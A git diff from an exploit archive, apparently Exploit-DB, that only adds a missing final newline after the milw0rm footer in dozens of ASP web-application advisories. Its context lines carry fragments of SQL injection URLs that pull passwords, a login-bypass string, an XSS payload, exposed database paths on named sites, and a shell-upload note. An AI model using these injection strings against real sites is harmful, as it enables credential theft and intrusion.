admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/asp/webapps/4988.txt b/platforms/asp/webapps/4988.txt index cbf3189f5..b350d626a 100755 --- a/platforms/asp/webapps/4988.txt +++ b/platforms/asp/webapps/4988.txt @@ -109,4 +109,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-25] +# milw0rm.com [2008-01-25] \ No newline at end of file diff --git a/platforms/asp/webapps/5185.txt b/platforms/asp/webapps/5185.txt index 505611aee..99c749cef 100755 --- a/platforms/asp/webapps/5185.txt +++ b/platforms/asp/webapps/5185.txt @@ -59,4 +59,4 @@ i m sory jane :( Kankilerim D3ng3s!z ve Pc faresi ne sevgiler el sallayin :S -# milw0rm.com [2008-02-25] +# milw0rm.com [2008-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/5187.txt b/platforms/asp/webapps/5187.txt index 8de103f4b..a7e63dd18 100755 --- a/platforms/asp/webapps/5187.txt +++ b/platforms/asp/webapps/5187.txt @@ -38,4 +38,4 @@ members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0, # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-25] +# milw0rm.com [2008-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/5274.txt b/platforms/asp/webapps/5274.txt index 6833bf1e8..872f02208 100755 --- a/platforms/asp/webapps/5274.txt +++ b/platforms/asp/webapps/5274.txt @@ -139,4 +139,4 @@ print "$version\n\n"; --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-03-18] +# milw0rm.com [2008-03-18] \ No newline at end of file diff --git a/platforms/asp/webapps/5276.txt b/platforms/asp/webapps/5276.txt index eb390414b..02bb8da73 100755 --- a/platforms/asp/webapps/5276.txt +++ b/platforms/asp/webapps/5276.txt @@ -45,4 +45,4 @@ links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,% thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque- -# milw0rm.com [2008-03-19] +# milw0rm.com [2008-03-19] \ No newline at end of file diff --git a/platforms/asp/webapps/5286.txt b/platforms/asp/webapps/5286.txt index f0e9273a0..d8b40677d 100755 --- a/platforms/asp/webapps/5286.txt +++ b/platforms/asp/webapps/5286.txt @@ -34,4 +34,4 @@ content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,passw thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque- -# milw0rm.com [2008-03-20] +# milw0rm.com [2008-03-20] \ No newline at end of file diff --git a/platforms/asp/webapps/5373.txt b/platforms/asp/webapps/5373.txt index 469a1dfd1..fe3dfd1b9 100755 --- a/platforms/asp/webapps/5373.txt +++ b/platforms/asp/webapps/5373.txt @@ -52,4 +52,4 @@ _-_-_-_-_- NURCİHAN _-_-_-_-_- BU SEVDA BİTMEZ _-_-_-_-_- 4 YIL OLDU Amk Greatz To : The_BekiR _-_ ka0x _-_ Nettoxic _-_ ZeberuS _-_ Str0ke -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/asp/webapps/5409.txt b/platforms/asp/webapps/5409.txt index e7571273b..d566eadad 100755 --- a/platforms/asp/webapps/5409.txt +++ b/platforms/asp/webapps/5409.txt @@ -73,4 +73,4 @@ MUSTAFA KEMAL ATATURK - ATAM İZİNDEYIZ /* -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/asp/webapps/5456.txt b/platforms/asp/webapps/5456.txt index 191bdf17d..f6f387b5b 100755 --- a/platforms/asp/webapps/5456.txt +++ b/platforms/asp/webapps/5456.txt @@ -110,4 +110,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-04-16] +# milw0rm.com [2008-04-16] \ No newline at end of file diff --git a/platforms/asp/webapps/5475.txt b/platforms/asp/webapps/5475.txt index 4103fa8dd..9f4c2c515 100755 --- a/platforms/asp/webapps/5475.txt +++ b/platforms/asp/webapps/5475.txt @@ -85,4 +85,4 @@ END IF ----------------------------- -# milw0rm.com [2008-04-20] +# milw0rm.com [2008-04-20] \ No newline at end of file diff --git a/platforms/asp/webapps/5482.py b/platforms/asp/webapps/5482.py index 539b0aea7..946ac11aa 100755 --- a/platforms/asp/webapps/5482.py +++ b/platforms/asp/webapps/5482.py @@ -151,4 +151,4 @@ elif pdataenum == 1: else: usage() -# milw0rm.com [2008-04-21] +# milw0rm.com [2008-04-21] \ No newline at end of file diff --git a/platforms/asp/webapps/5503.txt b/platforms/asp/webapps/5503.txt index 40d96a495..664f030a7 100755 --- a/platforms/asp/webapps/5503.txt +++ b/platforms/asp/webapps/5503.txt @@ -64,4 +64,4 @@ My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - U238 | Web - Designer Solutions Developer -# milw0rm.com [2008-04-26] +# milw0rm.com [2008-04-26] \ No newline at end of file diff --git a/platforms/asp/webapps/5507.txt b/platforms/asp/webapps/5507.txt index 5f65227a1..0d0d48ca8 100755 --- a/platforms/asp/webapps/5507.txt +++ b/platforms/asp/webapps/5507.txt @@ -90,4 +90,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/asp/webapps/5553.txt b/platforms/asp/webapps/5553.txt index fbfededa0..4ffbb3e3c 100755 --- a/platforms/asp/webapps/5553.txt +++ b/platforms/asp/webapps/5553.txt @@ -35,4 +35,4 @@ from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko') -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/asp/webapps/5556.txt b/platforms/asp/webapps/5556.txt index f39444d21..3a835d2a6 100755 --- a/platforms/asp/webapps/5556.txt +++ b/platforms/asp/webapps/5556.txt @@ -41,4 +41,4 @@ http://localhost/PostcardMentor/step1.asp?cat_fldAuto={SQL} -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/asp/webapps/5564.txt b/platforms/asp/webapps/5564.txt index 23a2e6019..a450196d6 100755 --- a/platforms/asp/webapps/5564.txt +++ b/platforms/asp/webapps/5564.txt @@ -70,4 +70,4 @@ This is Admin Panel See You ? --------------------------------- -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/asp/webapps/5608.txt b/platforms/asp/webapps/5608.txt index 75598546a..b9286a3b5 100755 --- a/platforms/asp/webapps/5608.txt +++ b/platforms/asp/webapps/5608.txt @@ -55,4 +55,4 @@ Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic Dunyanın En buyuk Ve En Zeki Lideri Olan Mustafa Kemal Ataturk'u Selamlarım. -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/asp/webapps/5633.pl b/platforms/asp/webapps/5633.pl index fe231085b..e5ceb4859 100755 --- a/platforms/asp/webapps/5633.pl +++ b/platforms/asp/webapps/5633.pl @@ -140,4 +140,4 @@ print "$version\n\n"; # --==+====================================================================================+==-- # [+] [The End] -# milw0rm.com [2008-05-16] +# milw0rm.com [2008-05-16] \ No newline at end of file diff --git a/platforms/asp/webapps/5705.txt b/platforms/asp/webapps/5705.txt index 39c58f82c..999ce8699 100755 --- a/platforms/asp/webapps/5705.txt +++ b/platforms/asp/webapps/5705.txt @@ -61,4 +61,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/asp/webapps/5717.txt b/platforms/asp/webapps/5717.txt index cd04a3d63..227ad7b22 100755 --- a/platforms/asp/webapps/5717.txt +++ b/platforms/asp/webapps/5717.txt @@ -22,4 +22,4 @@ Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass ###################################################################################################### -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/asp/webapps/5753.txt b/platforms/asp/webapps/5753.txt index 3d9a6cdae..b080f2bd1 100755 --- a/platforms/asp/webapps/5753.txt +++ b/platforms/asp/webapps/5753.txt @@ -22,4 +22,4 @@ __--> MS Access : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2 --//--> -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/asp/webapps/5763.txt b/platforms/asp/webapps/5763.txt index 11eef8ca3..6046c4c3d 100755 --- a/platforms/asp/webapps/5763.txt +++ b/platforms/asp/webapps/5763.txt @@ -35,4 +35,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/asp/webapps/5765.txt b/platforms/asp/webapps/5765.txt index 7ba8859d5..b234b472b 100755 --- a/platforms/asp/webapps/5765.txt +++ b/platforms/asp/webapps/5765.txt @@ -37,4 +37,4 @@ Or blind it : [+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew... -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/asp/webapps/5775.txt b/platforms/asp/webapps/5775.txt index dfaf20273..939903e9c 100755 --- a/platforms/asp/webapps/5775.txt +++ b/platforms/asp/webapps/5775.txt @@ -55,4 +55,4 @@ line 21: TopicId = rs("Topic_Id") --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/asp/webapps/5780.txt b/platforms/asp/webapps/5780.txt index a9e2f0a8d..11842040a 100755 --- a/platforms/asp/webapps/5780.txt +++ b/platforms/asp/webapps/5780.txt @@ -27,4 +27,4 @@ So simple! [+] Greetz : stack , Bl@ckbe@rD , Djekmani , HouSSamiX -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/asp/webapps/5781.txt b/platforms/asp/webapps/5781.txt index 8014a920c..5b2762c24 100755 --- a/platforms/asp/webapps/5781.txt +++ b/platforms/asp/webapps/5781.txt @@ -35,4 +35,4 @@ Or blind it : [+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew... -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/asp/webapps/5805.txt b/platforms/asp/webapps/5805.txt index 491d19d0f..170ef0e5f 100755 --- a/platforms/asp/webapps/5805.txt +++ b/platforms/asp/webapps/5805.txt @@ -30,4 +30,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/asp/webapps/5849.txt b/platforms/asp/webapps/5849.txt index f43417e65..3c75bcaf5 100755 --- a/platforms/asp/webapps/5849.txt +++ b/platforms/asp/webapps/5849.txt @@ -66,4 +66,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/asp/webapps/5850.txt b/platforms/asp/webapps/5850.txt index fecf9ff1e..0af8b203a 100755 --- a/platforms/asp/webapps/5850.txt +++ b/platforms/asp/webapps/5850.txt @@ -15,4 +15,4 @@ upload form Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/asp/webapps/5869.txt b/platforms/asp/webapps/5869.txt index ee00a4b0b..098108f47 100755 --- a/platforms/asp/webapps/5869.txt +++ b/platforms/asp/webapps/5869.txt @@ -103,4 +103,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/asp/webapps/5894.txt b/platforms/asp/webapps/5894.txt index a90b2a185..b00a06635 100755 --- a/platforms/asp/webapps/5894.txt +++ b/platforms/asp/webapps/5894.txt @@ -26,4 +26,4 @@ http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id, [+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew... -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/asp/webapps/5912.txt b/platforms/asp/webapps/5912.txt index 5d5e48df6..a53401cb5 100755 --- a/platforms/asp/webapps/5912.txt +++ b/platforms/asp/webapps/5912.txt @@ -24,4 +24,4 @@ http://www.site.xx/index.asp?newsid=927+union+select+1,password,3,4,userid,6,7+f [+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew... -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/asp/webapps/5927.txt b/platforms/asp/webapps/5927.txt index 5ac1ed33b..0f56386e6 100755 --- a/platforms/asp/webapps/5927.txt +++ b/platforms/asp/webapps/5927.txt @@ -27,4 +27,4 @@ http://d0rk.co.il/calendar/detail.asp?iEve={SQL} --//--> Greetz : allah , Underz0ne Crew , and all my friends .. -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/asp/webapps/6104.pl b/platforms/asp/webapps/6104.pl index 0b9381eb9..2969dd439 100755 --- a/platforms/asp/webapps/6104.pl +++ b/platforms/asp/webapps/6104.pl @@ -95,4 +95,4 @@ sub istrue2 } } -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/asp/webapps/6105.pl b/platforms/asp/webapps/6105.pl index 1be034627..006f958bc 100755 --- a/platforms/asp/webapps/6105.pl +++ b/platforms/asp/webapps/6105.pl @@ -101,4 +101,4 @@ sub istrue2 } } -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/asp/webapps/6119.txt b/platforms/asp/webapps/6119.txt index cf3cd17c8..457bcad47 100755 --- a/platforms/asp/webapps/6119.txt +++ b/platforms/asp/webapps/6119.txt @@ -16,4 +16,4 @@ Demo Page ; http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users -# milw0rm.com [2008-07-22] +# milw0rm.com [2008-07-22] \ No newline at end of file diff --git a/platforms/asp/webapps/6135.txt b/platforms/asp/webapps/6135.txt index 6b6db2adf..c1d68325b 100755 --- a/platforms/asp/webapps/6135.txt +++ b/platforms/asp/webapps/6135.txt @@ -17,4 +17,4 @@ Found By U238 # inurl:"fipsASP 2003 - 2008" # ************************************************ -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/asp/webapps/6405.txt b/platforms/asp/webapps/6405.txt index bf472dfa2..6f8ab90a3 100755 --- a/platforms/asp/webapps/6405.txt +++ b/platforms/asp/webapps/6405.txt @@ -20,4 +20,4 @@ You can upload an asp shell through file manager Enjoy !!! -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/asp/webapps/6420.txt b/platforms/asp/webapps/6420.txt index d0901126f..4967bbd06 100755 --- a/platforms/asp/webapps/6420.txt +++ b/platforms/asp/webapps/6420.txt @@ -50,4 +50,4 @@ http://site.com/album/album.asp?action=summary&message= [Peace xD ] -# milw0rm.com [2008-11-17] +# milw0rm.com [2008-11-17] \ No newline at end of file diff --git a/platforms/asp/webapps/7259.txt b/platforms/asp/webapps/7259.txt index 5dc9162a5..9722a6838 100755 --- a/platforms/asp/webapps/7259.txt +++ b/platforms/asp/webapps/7259.txt @@ -44,4 +44,4 @@ https://www.tarkentonsports.com/Comersus/database/comersus.mdb https://www.tarkentonsports.com/Comersus/store/comersus_message.asp?message=%3Cscript%3Ealert(%27Bl@ckbe@rD%20is%20not%20dead%20yet%27)%3C/script%3E[Peace%20xD%20] -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/asp/webapps/7273.txt b/platforms/asp/webapps/7273.txt index 9d00b3605..2afb95663 100755 --- a/platforms/asp/webapps/7273.txt +++ b/platforms/asp/webapps/7273.txt @@ -41,4 +41,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7274.txt b/platforms/asp/webapps/7274.txt index 4e3cba8e0..eaab50a86 100755 --- a/platforms/asp/webapps/7274.txt +++ b/platforms/asp/webapps/7274.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7275.txt b/platforms/asp/webapps/7275.txt index aa902aa80..d3631fc78 100755 --- a/platforms/asp/webapps/7275.txt +++ b/platforms/asp/webapps/7275.txt @@ -40,4 +40,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7276.txt b/platforms/asp/webapps/7276.txt index 92b309ec3..f6a642cf9 100755 --- a/platforms/asp/webapps/7276.txt +++ b/platforms/asp/webapps/7276.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7277.txt b/platforms/asp/webapps/7277.txt index 5856692e5..3ac299f7b 100755 --- a/platforms/asp/webapps/7277.txt +++ b/platforms/asp/webapps/7277.txt @@ -39,4 +39,4 @@   [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7278.txt b/platforms/asp/webapps/7278.txt index 1e6fe0ae7..a69f7d802 100755 --- a/platforms/asp/webapps/7278.txt +++ b/platforms/asp/webapps/7278.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7279.txt b/platforms/asp/webapps/7279.txt index e0f81206e..a4c53fdbc 100755 --- a/platforms/asp/webapps/7279.txt +++ b/platforms/asp/webapps/7279.txt @@ -42,4 +42,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7280.txt b/platforms/asp/webapps/7280.txt index 9c3e16bfe..5cae118da 100755 --- a/platforms/asp/webapps/7280.txt +++ b/platforms/asp/webapps/7280.txt @@ -42,4 +42,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7281.txt b/platforms/asp/webapps/7281.txt index 3c0e04d9c..82f9dec38 100755 --- a/platforms/asp/webapps/7281.txt +++ b/platforms/asp/webapps/7281.txt @@ -42,4 +42,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7282.txt b/platforms/asp/webapps/7282.txt index f8a4127c3..e04dd3a37 100755 --- a/platforms/asp/webapps/7282.txt +++ b/platforms/asp/webapps/7282.txt @@ -42,4 +42,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7283.txt b/platforms/asp/webapps/7283.txt index 84c79c628..951d9b885 100755 --- a/platforms/asp/webapps/7283.txt +++ b/platforms/asp/webapps/7283.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7287.txt b/platforms/asp/webapps/7287.txt index 7d0b8374a..f233a171e 100755 --- a/platforms/asp/webapps/7287.txt +++ b/platforms/asp/webapps/7287.txt @@ -40,4 +40,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7288.txt b/platforms/asp/webapps/7288.txt index a0bd2a2f2..edebbb499 100755 --- a/platforms/asp/webapps/7288.txt +++ b/platforms/asp/webapps/7288.txt @@ -65,4 +65,4 @@ just let your m1nd breath ;) [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7292.txt b/platforms/asp/webapps/7292.txt index 5d849c748..bf64d3ac5 100755 --- a/platforms/asp/webapps/7292.txt +++ b/platforms/asp/webapps/7292.txt @@ -28,4 +28,4 @@ SITE : cwh.citec.us http://[Target]/database/aspthaiForum.mdb -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7293.txt b/platforms/asp/webapps/7293.txt index ce74dd3e0..ab2992184 100755 --- a/platforms/asp/webapps/7293.txt +++ b/platforms/asp/webapps/7293.txt @@ -63,4 +63,4 @@ EnjoY. = [AttaCk Is CompLet] = ___________________________________________________________________________________________________________________________________________________________ -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7295.txt b/platforms/asp/webapps/7295.txt index 00eb64780..20df6bf12 100755 --- a/platforms/asp/webapps/7295.txt +++ b/platforms/asp/webapps/7295.txt @@ -65,4 +65,4 @@ just let your m1nd breath ;) [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-11-29] +# milw0rm.com [2008-11-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7316.txt b/platforms/asp/webapps/7316.txt index d1ef3d95e..be0ea8ca9 100755 --- a/platforms/asp/webapps/7316.txt +++ b/platforms/asp/webapps/7316.txt @@ -29,4 +29,4 @@ SITE : cwh.citec.us http://[Target]/[aspportal_path]/Data/ASPPortal.mdb -# milw0rm.com [2008-12-01] +# milw0rm.com [2008-12-01] \ No newline at end of file diff --git a/platforms/asp/webapps/7325.txt b/platforms/asp/webapps/7325.txt index 5186bdab9..eff86b000 100755 --- a/platforms/asp/webapps/7325.txt +++ b/platforms/asp/webapps/7325.txt @@ -51,4 +51,4 @@ http://www.codefixer.com/mailingList/db/MailingList.mdb ########################################################################### -# milw0rm.com [2008-12-02] +# milw0rm.com [2008-12-02] \ No newline at end of file diff --git a/platforms/asp/webapps/7326.txt b/platforms/asp/webapps/7326.txt index 9ed282cdb..978696443 100755 --- a/platforms/asp/webapps/7326.txt +++ b/platforms/asp/webapps/7326.txt @@ -49,4 +49,4 @@ just let your m1nd breath ;) [~]-----------------------------------------{str0ke}---------------------------------------------- -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/asp/webapps/7327.txt b/platforms/asp/webapps/7327.txt index 809594d2b..c644d7b5f 100755 --- a/platforms/asp/webapps/7327.txt +++ b/platforms/asp/webapps/7327.txt @@ -49,4 +49,4 @@ just let your m1nd breath ;) [~]-----------------------------------------{str0ke}---------------------------------------------- -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/asp/webapps/7340.txt b/platforms/asp/webapps/7340.txt index 50d970e87..c581f3aab 100755 --- a/platforms/asp/webapps/7340.txt +++ b/platforms/asp/webapps/7340.txt @@ -21,4 +21,4 @@ # Boyle aciklarida yayinliyosan yuh a.g ####################################################### -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/asp/webapps/7348.txt b/platforms/asp/webapps/7348.txt index fe5c10e6f..2ea3d56f9 100755 --- a/platforms/asp/webapps/7348.txt +++ b/platforms/asp/webapps/7348.txt @@ -25,4 +25,4 @@ http://demo.merlix.com/school/db/db.mdb [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7349.txt b/platforms/asp/webapps/7349.txt index d50963577..754c651d2 100755 --- a/platforms/asp/webapps/7349.txt +++ b/platforms/asp/webapps/7349.txt @@ -29,4 +29,4 @@ http://www.top50.co.nz/rankup.asp?siteID=convert(int,(select+top+1+sitePassword+ ########################################################################### -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7350.txt b/platforms/asp/webapps/7350.txt index 1f74fecf9..8871cc91e 100755 --- a/platforms/asp/webapps/7350.txt +++ b/platforms/asp/webapps/7350.txt @@ -39,4 +39,4 @@ password : ' or '1'='1 ########################################################################### -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7353.txt b/platforms/asp/webapps/7353.txt index 478486d1e..708e67f96 100755 --- a/platforms/asp/webapps/7353.txt +++ b/platforms/asp/webapps/7353.txt @@ -17,4 +17,4 @@ my mail: kivi_hacker666@yahoo.com *************************************************** -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7356.txt b/platforms/asp/webapps/7356.txt index 50cead8c6..abfa16aec 100755 --- a/platforms/asp/webapps/7356.txt +++ b/platforms/asp/webapps/7356.txt @@ -34,4 +34,4 @@ http://demo.merlix.com/autodealer/auto.mdb ########################################################################### -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7357.txt b/platforms/asp/webapps/7357.txt index 3dfd30361..4330e0fd8 100755 --- a/platforms/asp/webapps/7357.txt +++ b/platforms/asp/webapps/7357.txt @@ -27,4 +27,4 @@ http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from ########################################################################### -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7359.txt b/platforms/asp/webapps/7359.txt index 584a10e36..d71c209aa 100755 --- a/platforms/asp/webapps/7359.txt +++ b/platforms/asp/webapps/7359.txt @@ -20,4 +20,4 @@ http://demo.merlix.com/ticker/news.mdb [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7360.txt b/platforms/asp/webapps/7360.txt index 7a0532490..b8bf23fb4 100755 --- a/platforms/asp/webapps/7360.txt +++ b/platforms/asp/webapps/7360.txt @@ -21,4 +21,4 @@ http://demo.merlix.com/autodealer/auto.mdb note: DD First submission /str0ke -# milw0rm.com [2008-12-06] +# milw0rm.com [2008-12-06] \ No newline at end of file diff --git a/platforms/asp/webapps/7361.txt b/platforms/asp/webapps/7361.txt index 2a12d4f86..d2752e71c 100755 --- a/platforms/asp/webapps/7361.txt +++ b/platforms/asp/webapps/7361.txt @@ -22,4 +22,4 @@ http://demo.merlix.com/portal/xportal.mdb [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-06] +# milw0rm.com [2008-12-06] \ No newline at end of file diff --git a/platforms/asp/webapps/7370.txt b/platforms/asp/webapps/7370.txt index 8054d7367..40cf4d322 100755 --- a/platforms/asp/webapps/7370.txt +++ b/platforms/asp/webapps/7370.txt @@ -33,4 +33,4 @@ http://www.natterchat.co.uk/versionpagerefresh/natterchat112.mdb ########################################################################### -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/asp/webapps/7371.txt b/platforms/asp/webapps/7371.txt index 674b86069..fdfece75c 100755 --- a/platforms/asp/webapps/7371.txt +++ b/platforms/asp/webapps/7371.txt @@ -16,4 +16,4 @@ # Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark) # #################################################################################################### -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/asp/webapps/7372.txt b/platforms/asp/webapps/7372.txt index 5880820e0..53ef50a10 100755 --- a/platforms/asp/webapps/7372.txt +++ b/platforms/asp/webapps/7372.txt @@ -16,4 +16,4 @@ # Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark) # #################################################################################################### -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/asp/webapps/7373.txt b/platforms/asp/webapps/7373.txt index 9fc4355dc..6be903eb8 100755 --- a/platforms/asp/webapps/7373.txt +++ b/platforms/asp/webapps/7373.txt @@ -49,4 +49,4 @@ http://demo.merlix.com/adbanner5/data/DataBase.mdb [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/asp/webapps/7376.txt b/platforms/asp/webapps/7376.txt index e3148d6a4..d1e9729d4 100755 --- a/platforms/asp/webapps/7376.txt +++ b/platforms/asp/webapps/7376.txt @@ -16,4 +16,4 @@ # Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark) # #################################################################################################### -# milw0rm.com [2008-12-07] +# 